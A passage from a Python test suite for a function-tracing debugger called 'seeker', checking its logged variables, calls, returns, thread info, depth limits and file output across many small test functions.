VariableEntry("qux"),
CallEntry("def bar1(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(0.1),
# In with in recursive call
LineEntry("bar2(x)"),
# Call to bar2 from within with
VariableEntry("_x", "1"),
VariableEntry("qux"),
CallEntry("def bar2(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(0.1),
# In with in recursive call
LineEntry("qux()"),
LineEntry(source_regex="with snoop:", min_python_version=(3, 10)),
ElapsedTimeEntry(0.4),
# Call to bar3 from after with
VariableEntry("_x", "9"),
VariableEntry("qux"),
CallEntry("def bar3(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(0.1),
# -- Similar to previous few sections,
# -- but from first call to foo
# In with in first call
LineEntry("bar2(x)"),
# Call to bar2 from within with
VariableEntry("_x", "2"),
VariableEntry("qux"),
CallEntry("def bar2(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(0.1),
# In with in first call
LineEntry("qux()"),
LineEntry(source_regex="with snoop:", min_python_version=(3, 10)),
ElapsedTimeEntry(0.7),
# Call to bar3 from after with
VariableEntry("_x", "9"),
VariableEntry("qux"),
CallEntry("def bar3(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(0.1),
),
)
def test_thread_info():
@seeker.tracer(only_watch=False, thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function("baba")
assert result == 15
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_multi_thread_info():
@seeker.tracer(only_watch=False, thread_info=True)
def my_function(foo):
x = 7
y = 8
return y + x
def parse_call_content(line):
return line.split("{event:9} ".format(event="call"))[-1]
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
my_function("baba")
t1 = threading.Thread(target=my_function, name="test123", args=["bubu"])
t1.start()
t1.join()
t1 = threading.Thread(target=my_function, name="bibi", args=["bibi"])
t1.start()
t1.join()
output = output_capturer.string_io.getvalue()
calls = [line for line in output.split("\n") if "call" in line]
main_thread = calls[0]
assert parse_call_content(main_thread) == parse_call_content(calls[1])
assert parse_call_content(main_thread) == parse_call_content(calls[2])
thread_info_regex = "([0-9]+-{name}+[ ]+)"
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry(
"def my_function(foo):",
thread_info_regex=thread_info_regex.format(name="MainThread"),
),
LineEntry(
"x = 7", thread_info_regex=thread_info_regex.format(name="MainThread")
),
VariableEntry("x", "7"),
LineEntry(
"y = 8", thread_info_regex=thread_info_regex.format(name="MainThread")
),
VariableEntry("y", "8"),
LineEntry(
"return y + x",
thread_info_regex=thread_info_regex.format(name="MainThread"),
),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
VariableEntry("foo", value_regex="u?'bubu'"),
CallEntry(
"def my_function(foo):",
thread_info_regex=thread_info_regex.format(name="test123"),
),
LineEntry(
"x = 7", thread_info_regex=thread_info_regex.format(name="test123")
),
VariableEntry("x", "7"),
LineEntry(
"y = 8", thread_info_regex=thread_info_regex.format(name="test123")
),
VariableEntry("y", "8"),
LineEntry(
"return y + x",
thread_info_regex=thread_info_regex.format(name="test123"),
),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
VariableEntry("foo", value_regex="u?'bibi'"),
CallEntry(
"def my_function(foo):",
thread_info_regex=thread_info_regex.format(name="bibi"),
),
LineEntry("x = 7", thread_info_regex=thread_info_regex.format(name="bibi")),
VariableEntry("x", "7"),
LineEntry("y = 8", thread_info_regex=thread_info_regex.format(name="bibi")),
VariableEntry("y", "8"),
LineEntry(
"return y + x", thread_info_regex=thread_info_regex.format(name="bibi")
),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_watch_only():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@seeker.tracer(
"foo.x",
"io.__name__",
'len(foo.__dict__["x"] * "abc")',
)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("io.__name__", "'io'"),
CallEntry("def my_function():"),
LineEntry("foo = Foo()"),
VariableEntry("foo.x", "2"),
VariableEntry('len(foo.__dict__["x"] * "abc")', "6"),
LineEntry(),
LineEntry(),
VariableEntry("foo.x", "4"),
VariableEntry('len(foo.__dict__["x"] * "abc")', "12"),
LineEntry(),
LineEntry(),
VariableEntry("foo.x", "16"),
VariableEntry('len(foo.__dict__["x"] * "abc")', "48"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_watch_all():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@seeker.tracer(
"foo.x",
"io.__name__",
'len(foo.__dict__["x"] * "abc")',
only_watch=False,
)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("Foo"),
VariableEntry("io.__name__", "'io'"),
CallEntry("def my_function():"),
LineEntry("foo = Foo()"),
VariableEntry("foo"),
VariableEntry("foo.x", "2"),
VariableEntry('len(foo.__dict__["x"] * "abc")', "6"),
LineEntry(),
VariableEntry("i", "0"),
LineEntry(),
VariableEntry("foo.x", "4"),
VariableEntry('len(foo.__dict__["x"] * "abc")', "12"),
LineEntry(),
VariableEntry("i", "1"),
LineEntry(),
VariableEntry("foo.x", "16"),
VariableEntry('len(foo.__dict__["x"] * "abc")', "48"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_watch_explode_only():
class Foo:
def __init__(self, x, y):
self.x = x
self.y = y
# thoughts what is list + []?
@seeker.tracer(watch_explode=("_d", "_point", "lst"))
def my_function():
_d = {"a": 1, "b": 2, "c": "ignore"}
_point = Foo(x=3, y=4)
lst = [7, 8, 9]
lst.append(10)
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry(),
VariableEntry("_d"),
VariableEntry("_d['a']", "1"),
VariableEntry("_d['b']", "2"),
VariableEntry("_d['c']", "'ignore'"),
LineEntry(),
VariableEntry("_point"),
VariableEntry("_point.x", "3"),
VariableEntry("_point.y", "4"),
LineEntry(),
VariableEntry("lst"),
VariableEntry("lst[0]", "7"),
VariableEntry("lst[1]", "8"),
VariableEntry("lst[2]", "9"),
# VariableEntry('lst'),
LineEntry(),
VariableEntry("lst"),
VariableEntry("lst[3]", "10"),
# VariableEntry('lst'),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_watch_explode_with_others():
class Foo:
def __init__(self, x, y):
self.x = x
self.y = y
@seeker.tracer(watch_explode=("_d", "_point", "lst + []"), only_watch=False)
def my_function():
_d = {"a": 1, "b": 2, "c": "ignore"}
_point = Foo(x=3, y=4)
lst = [7, 8, 9]
lst.append(10)
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("Foo"),
CallEntry("def my_function():"),
LineEntry(),
VariableEntry("_d"),
VariableEntry("_d['a']", "1"),
VariableEntry("_d['b']", "2"),
VariableEntry("_d['c']", "'ignore'"),
LineEntry(),
VariableEntry("_point"),
VariableEntry("_point.x", "3"),
VariableEntry("_point.y", "4"),
LineEntry(),
VariableEntry("lst"),
VariableEntry("(lst + [])[0]", "7"),
VariableEntry("(lst + [])[1]", "8"),
VariableEntry("(lst + [])[2]", "9"),
VariableEntry("lst + []"),
LineEntry(),
VariableEntry("lst"),
VariableEntry("(lst + [])[3]", "10"),
VariableEntry("lst + []"),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_variables_classes_only():
class WithSlots(object):
__slots__ = ("x", "y")
def __init__(self):
self.x = 3
self.y = 4
@seeker.tracer(
seeker.Keys("_d", exclude="c"),
seeker.Attrs("_d"), # doesn't have attributes
seeker.Attrs("_s"),
seeker.Indices("_lst")[-3:],
)
def my_function():
_d = {"a": 1, "b": 2, "c": "ignore"}
_s = WithSlots()
_lst = list(range(1000))
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry(),
VariableEntry("_d"),
VariableEntry("_d['a']", "1"),
VariableEntry("_d['b']", "2"),
LineEntry(),
VariableEntry("_s"),
VariableEntry("_s.x", "3"),
VariableEntry("_s.y", "4"),
LineEntry(),
VariableEntry("_lst"),
VariableEntry("_lst[997]", "997"),
VariableEntry("_lst[998]", "998"),
VariableEntry("_lst[999]", "999"),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_variables_classes_with_others():
class WithSlots(object):
__slots__ = ("x", "y")
def __init__(self):
self.x = 3
self.y = 4
@seeker.tracer(
seeker.Keys("_d", exclude="c"),
seeker.Attrs("_d"), # doesn't have attributes
seeker.Attrs("_s"),
seeker.Indices("_lst")[-3:],
only_watch=False,
)
def my_function():
_d = {"a": 1, "b": 2, "c": "ignore"}
_s = WithSlots()
_lst = list(range(1000))
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("WithSlots"),
CallEntry("def my_function():"),
LineEntry(),
VariableEntry("_d"),
VariableEntry("_d['a']", "1"),
VariableEntry("_d['b']", "2"),
LineEntry(),
VariableEntry("_s"),
VariableEntry("_s.x", "3"),
VariableEntry("_s.y", "4"),
LineEntry(),
VariableEntry("_lst"),
VariableEntry("_lst[997]", "997"),
VariableEntry("_lst[998]", "998"),
VariableEntry("_lst[999]", "999"),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_single_keyword_watch_no_comma_only():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@seeker.tracer(watch="foo")
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry("foo = Foo()"),
VariableEntry("foo"),
LineEntry(),
LineEntry(),
LineEntry(),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_single_watch_no_comma_only():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@seeker.tracer("foo")
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry("foo = Foo()"),
VariableEntry("foo"),
LineEntry(),
LineEntry(),
LineEntry(),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_single_keyword_watch_no_comma_with_others():
class Foo(object):
def __init__(self):
self.x = 2
def square(self):
self.x **= 2
@seeker.tracer(watch="foo", only_watch=False)
def my_function():
foo = Foo()
for i in range(2):
foo.square()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("Foo"),
CallEntry("def my_function():"),
LineEntry("foo = Foo()"),
VariableEntry("foo"),
LineEntry(),
VariableEntry("i", "0"),
LineEntry(),
LineEntry(),
VariableEntry("i", "1"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_long_variable(long_arr_value):
@seeker.tracer("foo")
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r"^(?=.{100}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$"
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry("foo = list(range(1000))"),
VariableEntry("foo", value=long_arr_value),
LineEntry(),
ReturnEntry(),
# TODO use shortish value or use original value
ReturnValueEntry(value_regex=regex),
ElapsedTimeEntry(),
),
)
def test_long_variable_with_custom_max_variable_length(long_arr_value):
@seeker.tracer("foo", max_variable_length=200)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
regex = r"^(?=.{200}$)\[0, 1, 2, .*\.\.\..*, 997, 998, 999\]$"
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry("foo = list(range(1000))"),
VariableEntry("foo", value=long_arr_value),
LineEntry(),
ReturnEntry(),
# TODO here is a bug, if you don't specify 'foo' in watch, the return value is a full0-length arr
# however, it you do specify the watch value, the return is a shortish repr
ReturnValueEntry(value_regex=regex),
ElapsedTimeEntry(),
),
)
def test_long_variable_with_infinite_max_variable_length():
@seeker.tracer("foo", max_variable_length=None)
def my_function():
foo = list(range(1000))
return foo
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = my_function()
assert result == list(range(1000))
output = output_capturer.string_io.getvalue()
# TODO LMAO, I definitely need to learn regular exp
regex = r"^(?=.{1000,100000}$)\[0, 1, 2, [^.]+ 997, 998, 999\]$"
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry("foo = list(range(1000))"),
VariableEntry("foo", value_regex=regex),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(value_regex=regex),
ElapsedTimeEntry(),
),
)
def test_repr_exception():
class Bad(object):
def __repr__(self):
1 / 0
@seeker.tracer("bad")
def my_function():
bad = Bad()
with mini_toolbox.OutputCapturer(stdout=False) as output_capturer:
result = my_function()
assert result is None
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
CallEntry("def my_function():"),
LineEntry("bad = Bad()"),
# TODO should I change the bad repr thing?
VariableEntry("bad", value="REPR FAILED"),
ReturnEntry(),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_depth():
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
@seeker.tracer(output=string_io, depth=3, only_watch=False)
def f1(x1):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
CallEntry("def f1(x1):"),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry("def f2(x2):"),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry("def f3(x3):"),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("20"),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("20"),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("20"),
ElapsedTimeEntry(),
),
)
@pytest.mark.skip(reason="Use custom prefix as identifier")
def test_method_and_prefix():
class Baz(object):
def __init__(self):
self.x = 2
@seeker.tracer(watch=("self.x",), prefix="ZZZ", only_watch=False)
def square(self):
foo = 7
self.x **= 2
return self
baz = Baz()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = baz.square()
assert result is baz
assert result.x == 4
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(prefix="ZZZ"),
VariableEntry("self", prefix="ZZZ"),
VariableEntry("self.x", "2", prefix="ZZZ"),
CallEntry("def square(self):", prefix="ZZZ"),
LineEntry("foo = 7", prefix="ZZZ"),
VariableEntry("foo", "7", prefix="ZZZ"),
LineEntry("self.x **= 2", prefix="ZZZ"),
VariableEntry("self.x", "4", prefix="ZZZ"),
LineEntry(prefix="ZZZ"),
ReturnEntry(prefix="ZZZ"),
ReturnValueEntry(prefix="ZZZ"),
ElapsedTimeEntry(prefix="ZZZ"),
),
prefix="ZZZ",
)
def test_file_output():
with mini_toolbox.create_temp_folder(prefix="seeker") as folder:
path = folder / "foo.log"
@seeker.tracer(output=path, only_watch=False)
def my_function(_foo):
x = 7
y = 8
return y + x
result = my_function("baba")
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("_foo", value_regex="u?'baba'"),
CallEntry("def my_function(_foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_confusing_decorator_lines():
string_io = io.StringIO()
def empty_decorator(function):
return function
@empty_decorator
@seeker.tracer(
"foo", "x", "y", "bar", output=string_io, depth=2
) # Multi-line decorator for extra confusion!
@empty_decorator
@empty_decorator
def my_function(foo):
x = lambda bar: 7
y = 8
return y + x(foo)
result = my_function("baba")
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
LineEntry(),
# inside lambda
VariableEntry("bar", value_regex="u?'baba'"),
CallEntry("x = lambda bar: 7"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("7"),
# back in my_function
ReturnEntry(),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_lambda():
string_io = io.StringIO()
my_function = seeker.tracer("x", output=string_io)(lambda x: x ** 2)
result = my_function(7)
assert result == 49
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("x", "7"),
CallEntry(source_regex="^my_function = seeker.*"),
LineEntry(source_regex="^my_function = seeker.*"),
ReturnEntry(source_regex="^my_function = seeker.*"),
ReturnValueEntry("49"),
ElapsedTimeEntry(),
),
)
def test_unavailable_source():
with mini_toolbox.create_temp_folder(
prefix="seeker"
) as folder, mini_toolbox.TempSysPathAdder(str(folder)):
module_name = "iaerojajsijf"
python_file_path = folder / ("%s.py" % (module_name,))
# ideas: this is import, you can use the same method to import modules!!!
content = textwrap.dedent(
u"""
from executor import seeker
from networkx import Node
node = Node('1')
@seeker.tracer(only_watch=False)
def f(x):
return x
node_id_list = [1, 2, 5, 7, 11]
node_list = []
for node_id in node_id_list:
node_list.append(Node(node_id))
"""
)
with python_file_path.open("w") as python_file:
python_file.write(content)
module = import_module(module_name)
python_file_path.unlink()
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = getattr(module, "f")(7)
node = getattr(module, "node_list")
assert result == 7
assert str(node) == "[1, 2, 5, 7, 11]"
output = output_capturer.output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(stage="starting"),
CallEntry("SOURCE IS UNAVAILABLE"),
LineEntry("SOURCE IS UNAVAILABLE"),
ReturnEntry("SOURCE IS UNAVAILABLE"),
ReturnValueEntry("7"),
ElapsedTimeEntry(),
),
)
def test_no_overwrite_by_default():
with mini_toolbox.create_temp_folder(prefix="seeker") as folder:
path = folder / "foo.log"
with path.open("w") as output_file:
output_file.write(u"lala")
@seeker.tracer(output=str(path), only_watch=False)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function("baba")
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert output.startswith("lala")
shortened_output = output[4:]
assert_output(
shortened_output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_overwrite():
with mini_toolbox.create_temp_folder(prefix="seeker") as folder:
path = folder / "foo.log"
with path.open("w") as output_file:
output_file.write(u"lala")
@seeker.tracer(output=str(path), overwrite=True, only_watch=False)
def my_function(foo):
x = 7
y = 8
return y + x
result = my_function("baba")
result = my_function("baba")
assert result == 15
with path.open() as output_file:
output = output_file.read()
assert "lala" not in output
assert_output(
output,
(
SourcePathEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
VariableEntry("foo", value_regex="u?'baba'"),
CallEntry("def my_function(foo):"),
LineEntry("x = 7"),
VariableEntry("x", "7"),
LineEntry("y = 8"),
VariableEntry("y", "8"),
LineEntry("return y + x"),
ReturnEntry("return y + x"),
ReturnValueEntry("15"),
ElapsedTimeEntry(),
),
)
def test_error_in_overwrite_argument():
with mini_toolbox.create_temp_folder(prefix="seeker") as folder:
with pytest.raises(Exception, match="can only be used when writing"):
@seeker.tracer(overwrite=True, only_watch=False)
def my_function(foo):
x = 7
y = 8
return y + x
def test_needs_parentheses():
assert not needs_parentheses("x")
assert not needs_parentheses("x.y")
assert not needs_parentheses("x.y.z")
assert not needs_parentheses("x.y.z[0]")
assert not needs_parentheses("x.y.z[0]()")
assert not needs_parentheses("x.y.z[0]()(3, 4 * 5)")
assert not needs_parentheses("foo(x)")
assert not needs_parentheses("foo(x+y)")
assert not needs_parentheses("(x+y)")
assert not needs_parentheses("[x+1 for x in ()]")
assert needs_parentheses("x + y")
assert needs_parentheses("x * y")
assert needs_parentheses("x and y")
assert needs_parentheses("x if z else y")
def test_with_block():
# Testing that a single Tracer can handle many mixed uses
snoop = seeker.tracer(only_watch=False)
def foo(x):
if x == 0:
bar1(x)
qux()
return
with snoop:
# There should be line entries for these three lines,
# no line entries for anything else in this function,
# but calls to all bar functions should be traced
foo(x - 1)
bar2(x)
qux()
int(4)
bar3(9)
return x
@snoop
def bar1(_x):
qux()
@snoop
def bar2(_x):
qux()
@snoop
def bar3(_x):
qux()
def qux():
return 9 # not traced, mustn't show up
with mini_toolbox.OutputCapturer(stdout=False, stderr=True) as output_capturer:
result = foo(2)
assert result == 2
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
# In first with
SourcePathEntry(),
VariableEntry("x", "2"),
VariableEntry("bar1"),
VariableEntry("bar2"),
VariableEntry("bar3"),
VariableEntry("foo"),
VariableEntry("qux"),
VariableEntry("snoop"),
LineEntry("foo(x - 1)"),
# In with in recursive call
VariableEntry("x", "1"),
VariableEntry("bar1"),
VariableEntry("bar2"),
VariableEntry("bar3"),
VariableEntry("foo"),
VariableEntry("qux"),
VariableEntry("snoop"),
LineEntry("foo(x - 1)"),
# Call to bar1 from if block outside with
VariableEntry("_x", "0"),
VariableEntry("qux"),
CallEntry("def bar1(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# In with in recursive call
LineEntry("bar2(x)"),
# Call to bar2 from within with
VariableEntry("_x", "1"),
VariableEntry("qux"),
CallEntry("def bar2(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# In with in recursive call
LineEntry("qux()"),
LineEntry(source_regex="with snoop:", min_python_version=(3, 10)),
ElapsedTimeEntry(),
# Call to bar3 from after with
VariableEntry("_x", "9"),
VariableEntry("qux"),
CallEntry("def bar3(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# -- Similar to previous few sections,
# -- but from first call to foo
# In with in first call
LineEntry("bar2(x)"),
# Call to bar2 from within with
VariableEntry("_x", "2"),
VariableEntry("qux"),
CallEntry("def bar2(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
# In with in first call
LineEntry("qux()"),
LineEntry(source_regex="with snoop:", min_python_version=(3, 10)),
ElapsedTimeEntry(),
# Call to bar3 from after with
VariableEntry("_x", "9"),
VariableEntry("qux"),
CallEntry("def bar3(_x):"),
LineEntry("qux()"),
ReturnEntry("qux()"),
ReturnValueEntry("None"),
ElapsedTimeEntry(),
),
)
def test_with_block_depth():
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
def f1(x1):
str(3)
with seeker.tracer(output=string_io, depth=3, only_watch=False):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
# the next line corresponds to normalize = true and we don't have normalize in the
# with block in f1()
# VariableEntry(),
VariableEntry(),
LineEntry("result1 = f2(x1)"),
VariableEntry(),
VariableEntry(),
CallEntry("def f2(x2):"),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry("def f3(x3):"),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("20"),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry("20"),
VariableEntry(min_python_version=(3, 10)),
LineEntry(source_regex="with seeker.tracer*", min_python_version=(3, 10)),
ElapsedTimeEntry(),
),
)
def test_cellvars():
string_io = io.StringIO()
def f2(a):
def f3(a):
x = 0
x += 1
def f4(a):
y = x
return 42
return f4(a)
return f3(a)
def f1(a):
# the sequence matters here,
with seeker.tracer(
"result1",
"f2",
"f3",
"f4",
"a",
"x",
"y",
"string_io",
output=string_io,
depth=4,
):
result1 = f2(a)
return result1
result = f1(42)
assert result == 42
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
# again, we don't have normalize here
# VariableEntry(),
VariableEntry(),
LineEntry("result1 = f2(a)"),
VariableEntry(),
CallEntry("def f2(a):"),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry("a"),
CallEntry("def f3(a):"),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
VariableEntry("x"),
CallEntry("def f4(a):"),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
VariableEntry(min_python_version=(3, 10)),
LineEntry(source_regex="with seeker.tracer*", min_python_version=(3, 10)),
ElapsedTimeEntry(),
),
)
def test_var_order():
string_io = io.StringIO()
def f(one, two, three, four):
five = None
six = None
seven = None
five, six, seven = 5, 6, 7
with seeker.tracer(
only_watch=False,
output=string_io,
depth=2,
):
result = f(1, 2, 3, 4)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
# again we don't have normalize
# VariableEntry(),
LineEntry("result = f(1, 2, 3, 4)"),
VariableEntry("one", "1"),
VariableEntry("two", "2"),
VariableEntry("three", "3"),
VariableEntry("four", "4"),
CallEntry("def f(one, two, three, four):"),
LineEntry(),
VariableEntry("five"),
LineEntry(),
VariableEntry("six"),
LineEntry(),
VariableEntry("seven"),
LineEntry(),
VariableEntry("five", "5"),
VariableEntry("six", "6"),
VariableEntry("seven", "7"),
ReturnEntry(),
ReturnValueEntry(),
VariableEntry("result", "None", min_python_version=(3, 10)),
LineEntry(source_regex="with seeker.tracer*", min_python_version=(3, 10)),
ElapsedTimeEntry(),
),
)
def test_truncate():
max_length = 20
for i in range(max_length * 2):
string = i * "a"
truncated = truncate(string, max_length)
if len(string) <= max_length:
assert string == truncated
else:
assert truncated == "aaaaaaaa...aaaaaaaaa"
assert len(truncated) == max_length
def test_indentation():
from .samples import indentation, recursion
assert_sample_output(indentation)
assert_sample_output(recursion)
def test_exception():
from .samples import exception
assert_sample_output(exception)
def test_generator():
string_io = io.StringIO()
original_tracer = sys.gettrace()
original_tracer_active = lambda: (sys.gettrace() is original_tracer)
@seeker.tracer(only_watch=False, output=string_io)
# thoughts: a few pitfalls here
# > first, the `original_tracer_active` is not in the function but it's in the functions' closure.
# if you want to trace that, `original_tracer_active` should also be included in the watch list
# > second, the assertion will also create new variables. In the following code,
# `@py_assert1`, and `@py_assert3` are
def f(x1):
assert not original_tracer_active()
x2 = yield x1
assert not original_tracer_active()
x3 = "foo"
assert not original_tracer_active()
x4 = yield 2
assert not original_tracer_active()
return
assert original_tracer_active()
generator = f(0)
